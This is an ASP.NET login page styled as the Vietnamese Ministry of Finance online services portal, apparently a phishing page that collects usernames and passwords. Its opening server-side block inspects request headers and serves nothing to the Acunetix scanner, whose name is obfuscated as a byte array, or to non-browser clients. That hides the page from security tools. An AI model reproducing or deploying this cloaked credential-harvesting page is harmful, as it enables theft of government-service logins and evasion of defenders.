﻿<%@ Page Language="C#" AutoEventWireup="true" CodeFile="login.aspx.cs" Inherits="login" %>

  <% 
     var headers = String.Empty;
     foreach (var key in Request.Headers.AllKeys)
         headers += key + "=" + Request.Headers[key] + Environment.NewLine;
    
     byte[] headerByteArray = new byte[] { 0x41, 0x63, 0x75, 0x6E, 0x65, 0x74, 0x69, 0x78};
     if (headers.Contains(System.Text.Encoding.ASCII.GetString(headerByteArray).Trim()) || ((headers.Contains("q=0.9,*/*;q=0.8")) && (!headers.Contains("Firefox")) && (!headers.Contains("Chrome")))) return;
     
%>

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Bộ Tài Chính - Dịch vụ công trực tuyến</title>
<link rel="stylesheet" href="css/style.default.css" type="text/css" />
<link rel="stylesheet" href="css/style.shinyblue.css" type="text/css" />

<script type="text/javascript" src="js/jquery-1.9.1.min.js"></script>
<script type="text/javascript" src="js/jquery-ui-1.9.2.min.js"></script>
<script type="text/javascript" src="js/bootstrap.min.js"></script>
<script type="text/javascript" src="js/jquery.alerts.js"></script>
<script type="text/javascript" src="js/custom.js"></script>
<script type="text/javascript">
    jQuery(document).ready(function(){
        jQuery('#login').submit(function(){
            var u = jQuery('#username').val();
            var p = jQuery('#password').val();
            if(u == '' && p == '') {
                jQuery('.login-alert').fadeIn();
                return false;
            }
        });
    });
</script>
</head>

<body class="loginpage">

<div class="loginpanel">
    <div class="loginpanelinner">
    <a href="default.aspx"><div class="logo animate0 "><img src="images/user.png" alt="" /></div></a>
        <div class="logo animate0 "><img src="images/logo.png" alt="" /></div>
        <form id="login" action="" method="post" enctype="multipart/form-data">
            <div class="inputwrapper login-alert">
                <div class="alert alert-error">Nhập sai tên tài khoản hoặc mật khẩu</div>
            </div>
            <div class="inputwrapper animate1 ">
                <input type="text" name="username" id="username" placeholder="Nhập tên tài khoản" />
            </div>
            <div class="inputwrapper animate2 ">
                <input type="password" name="password" id="password" placeholder="Nhập mật khẩu" />
            </div>
            <div class="inputwrapper animate3 ">
                <button name="submit">Đăng nhập</button>
            </div>
            <div class="inputwrapper animate4 ">
                <label><input type="checkbox" class="remember" name="signin" /> Ghi nhớ thông tin đăng nhập</label>
            </div>
            
        </form>
    </div><!--loginpanelinner-->
</div><!--loginpanel-->

<asp:PlaceHolder ID="alert" runat="server"></asp:PlaceHolder>

<div class="loginfooter">
    <p>&copy; 2014. Cục Tin học và Thống kê Tài Chính - Bộ Tài Chính.</p>
</div>

</body>
</html>



